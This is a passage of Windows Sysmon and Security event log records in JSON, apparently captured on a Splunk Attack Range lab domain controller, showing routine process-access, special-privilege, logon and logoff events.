C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:55.674","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5852,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:55.674\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:55.674","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5853,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:55.674\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:55.674","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5854,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:55.674\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0373-5F25-0000-0010D4E60A00}\r\nTargetProcessId: 1540\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:55.674","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0373-5F25-0000-0010D4E60A00}","TargetProcessId":"1540","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220680,"ProcessID":864,"ThreadID":1544,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xAE989\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xae989","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:54:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220681,"ProcessID":864,"ThreadID":1544,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0xAE989\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t54973\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0xae989","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"54973","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:54:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220682,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xAE989\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xae989","LogonType":"3","EventReceivedTime":"2020-08-01 05:54:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5855,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:30.535\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010C0A90000}\r\nSourceProcessId: 996\r\nSourceThreadId: 4500\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nTargetProcessId: 612\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:30.535","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010C0A90000}","SourceProcessId":"996","SourceThreadId":"4500","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","TargetProcessId":"612","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5856,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:30.535\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010C0A90000}\r\nSourceProcessId: 996\r\nSourceThreadId: 4500\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010A5B80000}\r\nTargetProcessId: 1132\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:30.535","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010C0A90000}","SourceProcessId":"996","SourceThreadId":"4500","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010A5B80000}","TargetProcessId":"1132","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5857,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:30.535\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010C0A90000}\r\nSourceProcessId: 996\r\nSourceThreadId: 4500\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:30.535","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010C0A90000}","SourceProcessId":"996","SourceThreadId":"4500","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5858,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:30.535\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010C0A90000}\r\nSourceProcessId: 996\r\nSourceThreadId: 4500\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D4CB0000}\r\nTargetProcessId: 1308\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:30.535","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010C0A90000}","SourceProcessId":"996","SourceThreadId":"4500","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D4CB0000}","TargetProcessId":"1308","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
